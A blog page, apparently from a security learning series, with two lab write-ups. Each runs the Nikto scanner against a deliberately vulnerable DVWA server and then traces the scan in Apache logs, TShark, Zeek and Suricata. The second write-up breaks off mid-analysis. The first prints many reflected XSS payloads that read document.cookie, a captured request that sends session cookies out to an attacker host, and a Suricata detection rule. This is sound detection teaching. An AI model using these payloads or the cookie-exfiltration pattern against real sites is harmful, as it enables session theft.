Tuesday, December 12, 2023

Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.

Posts in this series:

The hack - Testing for injection types of attacks.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ nikto -host http://10.0.0.106/dvwa -ipv4 -Display 2 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 4 -evasion 3 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ sent cookie: security=low; path=/
+ /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ sent cookie: PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Using Encoding:     Premature URL ending
+ Start Time:         2023-06-02 13:37:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /dvwa/cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
...
+ /%20HTTP/1.1%0d%0aAccept%3a%20p2zcHyr0eeyZKdsykh/../../dvwa/ sent cookie: security=low; path=/
+ /%20HTTP/1.1%0d%0aAccept%3a%20p2zcHyr0eeyZKdsykh/../../dvwa/ sent cookie: PHPSESSID=jaes6gbb1elm9qft6eti7nbrl8; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/
+ /dvwa/: Retrieved x-powered-by header: PHP/8.0.28.
+ /dvwa/: Cookie security created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /dvwa/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
...
+ /%20HTTP/1.1%0d%0aAccept%3a%20ru6vqb1X2lXvU6PYe/../../dvwa/index.php?option=search&searchword=<script>alert(document.cookie);</script> sent cookie: security=low; path=/
+ /%20HTTP/1.1%0d%0aAccept%3a%20n6qmprr4FiSvDr7/../../dvwa/index.php?dir=<script>alert('Vulnerable')</script> sent cookie: security=low; path=/
...
+ /%20HTTP/1.1%0d%0aAccept%3a%20XUyeQs43O3P6ka/../../dvwa/phpinfo.php?cx[]=rYLxwx...zxZ2HcuXX<script>alert(foo)</script> sent cookie: PHPSESSID=adhqsj51ur05nph7mitqi9kfvc; expires=Sat, 03-Jun-2023 17:37:25 GMT; Max-Age=86400; path=/
+ /%20HTTP/1.1%0d%0aAccept%3a%20OME1Ins6pMdk8/../../dvwa/?xmlcontrol=body%20onload=alert(123) sent cookie: security=low; path=/
+ 958 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-06-02 13:37:45 (GMT-4) (3 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

---------------------------------------------------------------------------

From above, I was surprised to see some of the parameters such as "index.php?dir=<script>alert('Vulnerable')</script>" sending the cookie. This caught me off guard as looking at the source of index.php does not show those parameters. Maybe I need to expand my knowledge on HTTP to get a better understanding of what transpired there.

Here are some of the unique parameters that were passed and their values. I'm going assume most of these are just values from the Nikto tool and not something it learned about from the page.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat tuning_4.txt | grep --perl-regexp 'index.php\?.*?</script>|phpinfo.php\?.*?</script>' --only-matching | \
head --lines=20 | sort --unique                                     
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script>
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?dir=<script>alert('Vulnerable')</script>
index.php?err=3&email=\"><script>alert(document.cookie)</script>
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?option=search&searchword=<script>alert(document.cookie);</script>
index.php?rep=<script>alert(document.cookie)</script>
index.php?vo=\"><script>alert(document.cookie);</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>

Time to transition to the log analysis to see if this will help my learnings.

To get more of attacking and detecting cross site scripting, see: 
Learning by practicing: Beginning Web Application Testing - Cross Site Scripting (XSS)–DVWA (securitynik.com)

Detect - Log Analysis

Time to understand from the logs, what this Nikto attack look like

Looking at the first 3 entries in the access log 

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ head access.log --lines=3
10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20oJaLwmzNOomj5k/../../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ HTTP/1.1" 200 5960 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20XvKT1obCp7xvYUFzg5/../../dvwa/cgi.cgi/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Looking at the HTTP methods.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat access.log | cut --fields 2 --delimiter '"' | cut -f 1 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse                                                         
    939 GET
      9 POST
      2 TRACK
      2 OPTIONS
      1 XULKCYAP
      1 TRACE
      1 <script>alert(1)</script>
      1 PUT
      1 PROPFIND
      1 DEBUG

Looking at the response codes, we see 33 200. There are definitely also some interesting response returned where the response codes should have been. Maybe that was poor filtering on my part. However, this is not a major concern at this time.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat access.log | cut --fields 3 --delimiter '"' | cut --fields=2 --delimiter=' ' | sort | uniq --count | sort --numeric-sort --reverse 
    821 404
     54 HTTP/1.1
     33 200
     17 403
      9 Vulnerable\\\
      5 test\\\
      4 400
      4 301
      3 &lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\
      1 ><script>alert(1)/script><\\\
      1 ><Img%20Src=javascript:alert('Vulnerable')><Img%20Src=\\\
      1 ><img%20src=\\\
      1 hello\\\
      1 417
      1 405
      1 302
      1 >\\\

The script tag is definitely a cause for concern in this case. 

Peeking at a the first 5 records

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat access.log | grep --perl-regexp "\s+200\s+" | cut --fields=2- --delimiter='"' | awk --field-separator=' 200 ' '{ print $1 }' | grep "script" --color=always | head --lines=5
GET /%20HTTP/1.1%0d%0aAccept%3a%20ru6vqb1X2lXvU6PYe/../../dvwa/index.php?option=search&searchword=<script>alert(document.cookie);</script> HTTP/1.1"
GET /%20HTTP/1.1%0d%0aAccept%3a%20n6qmprr4FiSvDr7/../../dvwa/index.php?dir=<script>alert('Vulnerable')</script> HTTP/1.1"
GET /%20HTTP/1.1%0d%0aAccept%3a%20qMTw97IoYwjs/../../dvwa/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1"
GET /%20HTTP/1.1%0d%0aAccept%3a%206aNVKEwARt/../../dvwa/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1"
GET /%20HTTP/1.1%0d%0aAccept%3a%20j7vq9Hi1xXNr4X/../../dvwa/index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script> HTTP/1.1"

I must admit, I was surprised to see status code 200 for those entries above as, when I searched "index.php", I don't see any of those parameters, i.e. "option", "file", "dir", etc.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ curl --request GET "http://10.0.0.106/dvwa/index.php" --silent | grep --perl-regexp --ignore-case 'type="text".*("action"|"searchFor"|"username"|"dir"|"err"|"file"|"op"|"rep"|"vo"|"GLOBALS[test]"|"VARIABLE")' | wc --lines 
0

To validate some of my knowledge, I used non existent parameters to target the site directly and still got status 200.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ curl --request GET http://10.0.0.106//dvwa/index.php?NonExistentShit=FalseFlags --remote-name --silent

This produced:

10.0.0.107 - - [05/Jun/2023:14:09:44 -0400] "GET //dvwa/index.php?NonExistentShit=FalseFlags HTTP/1.1" 200 5960 "-" "curl/7.88.1"

At this point, I'm going to conclude the 200 was returned for the page and not the parameter.

Peeking at the first few lines of the error.log file, looking for which attempt was made to run the script on.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" | head --lines=5                                                                  
[Fri Jun 02 13:37:21.898886 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55840] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/cgi.cgi
[Fri Jun 02 13:37:23.506008 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/index.asp
[Fri Jun 02 13:37:23.506008 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/junk999.asp
[Fri Jun 02 13:37:23.522563 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/login.asp
[Fri Jun 02 13:37:23.637381 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:47494] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/index.cgi
...

Above shows "script not found". How many of those "script not found" do we have?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --only-matching | sort --unique | cut --fields=2 --delimiter='C' | cut --fields=1 --delimiter="'" | cut --fields=1 --delimiter=',' | sort --unique | wc --lines
93

With 93 files accessed, was any "found"? Invert the "grep".

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*"  --invert-match | \
grep --perl-regexp "Cannot\s+map|s+GET"
[Fri Jun 02 13:37:24.113277 2023] [core:error] [pid 7548:tid 1864] (20024)The given path is misformatted or contained invalid characters: [client 10.0.0.108:47510] AH00127: Cannot map GET /%20HTTP/1.1%0d%0aAccept%3a%20RIxToXpAUn2JvPd87/../../dvwa/666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.1 to file
...

Removing those cannot map messages.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*"  --invert-match | \
grep --perl-regexp "Cannot\s+map|s+GET" --invert-match 
[Fri Jun 02 13:37:23.522563 2023] [php:warn] [pid 7548:tid 1864] [client 10.0.0.108:55874] PHP Warning:  Undefined array key "HTTP_HOST" in C:\\xampp\\htdocs\\dvwa\\dvwa\\includes\\dvwaPage.inc.php on line 45
...

At this point, I have not seen anything in the error.log that suggest this attack was successful. We know we can see lots of "<script>alert('Vulnerable')</script>" which definitely suggest we should be concerned about the source IP involved with this activity. However, we have to work with the evidence we currently have and not what we want.



Detect - Packet Analysis

Setup for packet analysis. Capture packets on ports 80,443

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0

What did we get from the capture.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ tshark -n -r tuning_4.pcap -Y 'http.response.code == 200' -T fields -e tcp.stream| sort --unique 
0
10
11
12
13
4
5
6
7
8
9

Looking at stream 0 with the query below, did not produce any results I found meaningful.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ tshark -n -r tuning_4.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=11

This stream did not produce the resulted that I expected. As a result, I decided to simulate stealing the cookie via cross scripting from a different perspective. When I looked at the packet capture, I see the cookie is sent via the GET request.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ tshark -n -r xss.pcap -q -z follow,tcp,ascii,1 | sed '1,7d' | sed '$d' 
GET /steal.txt?security=low;%20PHPSESSID=c9nho1bvu73dg6baehjo2vjgcn HTTP/1.1
Host: 10.0.0.107:9999
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.0.0.106/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Wrapping this up. In my opinion, the cookie which was returned was not a cookie that was stolen but instead the cookie which was part of the Nikto session.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ strings tuning_4.pcap | grep "3a%209dezoCMqi7" --after-context=10
GET /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ HTTP/1.1
Host: 10.0.0.106
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
HTTP/1.1 200 OK
Date: Fri, 02 Jun 2023 17:37:21 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT

Moving on now.

Detect - Zeek Analysis

Setup Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Looking at the analyzer.log file

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat analyzer.log 
...
#open   2023-06-02-13-37-45
#fields ts      cause   analyzer_kind   analyzer_name   uid     fuid    id.orig_h       id.orig_p       id.resp_h       id.resp_p       failure_reason  failure_data
#types  time    string  string  string  string  string  addr    port    addr    port    string  string
1685727465.687074       violation       protocol        HTTP    CvBOhB3P4vU8YucCt6      -       10.0.0.108      47542   10.0.0.106      80      not a http request line       -
#close  2023-06-02-13-37-53

Above shows traffic between two hosts occurring on port 80, typically HTTP, but we see "failure_reason" as "not a http request line".

Looking at UID "CvBOhB3P4vU8YucCt6" to find which other logs this UID is seen in.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ grep "CvBOhB3P4vU8YucCt6" *.log | cut --fields=1 --delimiter=":" | sort --unique                                                                          
analyzer.log
conn.log
dpd.log
files.log
http.log
weird.log

Looking at the weird.log

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat weird.log                                                                                                                                             
#fields ts      uid     id.orig_h       id.orig_p       id.resp_h       id.resp_p       name    addl    notice  peer    source
1685727464.327551       CdCvW413cTsQUyb9lf      10.0.0.108      55874   10.0.0.106      80      HTTP_version_mismatch   -       F       zeek    HTTP
1685727464.641628       CZCM3y1MlJGfr3DZ27      10.0.0.108      47496   10.0.0.106      80      unknown_HTTP_method     XULKCYAP        F       zeek    -
1685727464.659445       CcdKGV3GMXMm4z9kI4      10.0.0.108      47504   10.0.0.106      80      unknown_HTTP_method     TRACK   F       zeek    -
1685727464.664164       CcdKGV3GMXMm4z9kI4      10.0.0.108      47504   10.0.0.106      80      HTTP_version_mismatch   -       F       zeek    HTTP
1685727464.950085       C4Ed651QVcleVPgo29      10.0.0.108      47520   10.0.0.106      80      unescaped_%_in_URI      -       F       zeek    HTTP
1685727465.454423       CmYMGa2Q3SpVd9r26d      10.0.0.108      47532   10.0.0.106      80      unescaped_%_in_URI      -       F       zeek    HTTP
1685727465.687074       CvBOhB3P4vU8YucCt6      10.0.0.108      47542   10.0.0.106      80      bad_HTTP_request_with_version   -       F       zeek    HTTP

While other lines are interesting and helpful, especially seeing unknown methods, the one that I will focus on is the last line. This was seen in the analyzer.log and we see this is "bad_HTTP_request_with_version"

Looking at the last 5 entries in the http.log.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ grep "CvBOhB3P4vU8YucCt6" http.log | grep --perl-regexp "/dvwa.*.?>" --only-matching | sort --unique | tail --lines=5
/dvwa/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
/dvwa/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>
/dvwa/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>
/dvwa/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
/dvwa/XJjRNFyhnLKaf4qbov1ToCeQUomdYA2Vj5S8TQBAEPOiEsXu4umBXddFMlvLzvZm6sPqllgtuX6TeLlDSSwVmLb490LxkJgeX2NnGsvgESafjKPUIHOYLmSAz5NFPDOc1qhQPE8ZSC26h12u9d1a987Zqbik1erQMssHWPByVRRo6zKaA9cp5A7SAijWurFZWxhXOp38ChVSiuQULsVXLS7wZCWWlVZ<font size=50><script>alert(11)</script>

Above all shows, this was a cross site scripting attack, against a few different parameters. The question obviously, is whether this was successful. Everything in the analysis so far suggest it was not.

Moving on to see what the IPS saw throughout this attack.

Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all

Looking at the alerts that triggered.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5                                                                
    265 1:2009714:8] ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt 
     39 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     19 1:2101201:11] GPL WEB_SERVER 403 Forbidden 
      9 1:2021005:3] ET WEB_SPECIFIC_APPS Vulnerable Magento Adminhtml Access 
      4 1:2019526:5] ET WEB_SERVER WEB-PHP phpinfo access

Above shows the majority of them were associated with 1 rule "1:2009714:8". This is what I expected to see as the activity performed above was cross site scripting. What is that rule looking for.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ grep "2009714" /var/lib/suricata/rules/suricata.rules 
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt"; flow:to_server,established; http.uri; content:"</script>"; nocase; reference:url,ha.ckers.org/xss.html; reference:url,doc.emergingthreats.net/2009714; classtype:web-application-attack; sid:2009714; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, former_category WEB_SERVER, signature_severity Major, tag XSS, tag Cross_Site_Scripting, updated_at 2020_08_20;)

Above shows the rule is basically looking for "</script>" in the URI. Looking into the packet where "</script>" was seen in the URI.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]
└─$ less alert-debug.log   
...
ALERT CNT:           1
ALERT MSG [00]:      ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt
ALERT GID [00]:      1
ALERT SID [00]:      2009714
ALERT REV [00]:      8
ALERT CLASS [00]:    Web Application Attack
ALERT PRIO [00]:     1
ALERT FOUND IN [00]: STATE
ALERT IN TX [00]:    27
PAYLOAD LEN:         341
PAYLOAD:
 0000  47 45 54 20 2F 25 32 30  48 54 54 50 2F 31 2E 31   GET /%20 HTTP/1.1
 0010  25 30 64 25 30 61 41 63  63 65 70 74 25 33 61 25   %0d%0aAc cept%3a%
 0020  32 30 73 7A 51 72 5A 76  56 6F 66 6D 47 57 4D 2F   20szQrZv VofmGWM/
 0030  2E 2E 2F 2E 2E 2F 64 76  77 61 2F 74 68 65 6D 65   ../../dv wa/theme
 0040  73 2F 6D 61 6D 62 6F 73  69 6D 70 6C 65 2E 70 68   s/mambos imple.ph
 0050  70 3F 64 65 74 65 63 74  69 6F 6E 3D 64 65 74 65   p?detect ion=dete
 0060  63 74 65 64 26 73 69 74  65 6E 61 6D 65 3D 3C 2F   cted&sit ename=</
 0070  74 69 74 6C 65 3E 3C 73  63 72 69 70 74 3E 61 6C   title><s cript>al
 0080  65 72 74 28 64 6F 63 75  6D 65 6E 74 2E 63 6F 6F   ert(docu ment.coo
 0090  6B 69 65 29 3C 2F 73 63  72 69 70 74 3E 20 48 54   kie)</sc ript> HT
 00A0  54 50 2F 31 2E 31 0D 0A  43 6F 6E 6E 65 63 74 69   TP/1.1.. Connecti
 00B0  6F 6E 3A 20 4B 65 65 70  2D 41 6C 69 76 65 0D 0A   on: Keep -Alive..
 00C0  55 73 65 72 2D 41 67 65  6E 74 3A 20 4D 6F 7A 69   User-Age nt: Mozi
 00D0  6C 6C 61 2F 35 2E 30 20  28 57 69 6E 64 6F 77 73   lla/5.0  (Windows
 00E0  20 4E 54 20 31 30 2E 30  3B 20 57 69 6E 36 34 3B    NT 10.0 ; Win64;
 00F0  20 78 36 34 29 20 41 70  70 6C 65 57 65 62 4B 69    x64) Ap pleWebKi
 0100  74 2F 35 33 37 2E 33 36  20 28 4B 48 54 4D 4C 2C   t/537.36  (KHTML,
 0110  20 6C 69 6B 65 20 47 65  63 6B 6F 29 20 43 68 72    like Ge cko) Chr
 0120  6F 6D 65 2F 37 34 2E 30  2E 33 37 32 39 2E 31 36   ome/74.0 .3729.16
 0130  39 20 53 61 66 61 72 69  2F 35 33 37 2E 33 36 0D   9 Safari /537.36.
 0140  0A 48 6F 73 74 3A 20 31  30 2E 30 2E 30 2E 31 30   .Host: 1 0.0.0.10
 0150  36 0D 0A 0D 0A                                     6....
...

Above shows the packet and what the rule matched on.

Nothing else interesting for me to focus on at this time.

Hope you enjoyed the posts in this series:
Posted by at No comments:
Labels: , , , , , , ,

Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.

Other posts in this series:

Hack - Leveraging the information disclosure with evasion technique Directory self-reference (/./)

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 3 -evasion 2
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Using Encoding:     Directory self-reference (/./)
+ Start Time:         2023-05-31 15:46:03 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
...
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
...
+ /%2e/ - Redirects (302) to http://10.0.0.106/dashboard/ , Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.
+ /?sql_debug=1 - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.
+ /index.php?sql_debug=1 - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.
...
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// - Redirects (302) to http://10.0.0.106/dashboard/ , Abyss 1.03 reveals directory listing when multiple /'s are requested.
...
+ End Time:           2023-05-31 15:46:19 (GMT-4) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Detect - Log Analysis

Looking at the first 5 lines of the access.log file.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ head access.log --lines=5
10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi.cgi/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./webcgi/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:15:45:44 -0400] "GET /./cgi-914/./ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

As always, looking at the HTTP Methods. Why so much emphasis on the HTTP methods? Well this is a HTTP based attack, isn't it?!

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ cat access.log | cut --fields 2 --delimiter '"' | cut -f 1 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse    
   1743 GET
      5 POST
      3 OPTIONS
      2 TRACK
      1 TRACE
      1 PUT
      1 PROPFIND
      1 INDEX
      1 GSHJQSVC
      1 get
      1 DEBUG

Int the interest of time, let's focus on the response codes:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ cat access.log | cut --fields 3 --delimiter '"' | cut -f 2 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse                                                                                   
   1665 404
     48 302
     24 403
     10 400
      6 503
      3 200
      1 HTTP/1.1
      1 417
      1 405
      1 >\\\

Focusing only on the 3 200 codes:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ cat access.log | grep --perl-regexp '\s+200\s+'
10.0.0.108 - - [31/May/2023:15:45:45 -0400] "GET /./favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:15:45:45 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.108 - - [31/May/2023:15:45:45 -0400] "TRACE /./ HTTP/1.0" 200 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Nothing pressing above. Transitioning to packet analysis.

Detect - Packet Analysis

Looking at the packets where the response codes is 200.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ tshark -n -r tuning_3.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -E header=y
ip.src  ip.dst  tcp.srcport     tcp.stream
10.0.0.106      10.0.0.108      80      4
10.0.0.106      10.0.0.108      80      8
10.0.0.106      10.0.0.108      80      9

Following stream 4, we see favicon.ico file was requested and returned successfully. We also see the size of the .ico file was 30894 bytes.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=11
GET /./favicon.ico HTTP/1.1
Connection: Keep-Alive
Host: 10.0.0.106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36


        1460
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 19:45:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive
Content-Type: image/x-icon

What is in stream 8?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_3]
└─$ tshark -n -r tuning_3.pcap -q -z follow,tcp,ascii,8 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=7
OPTIONS * HTTP/1.1
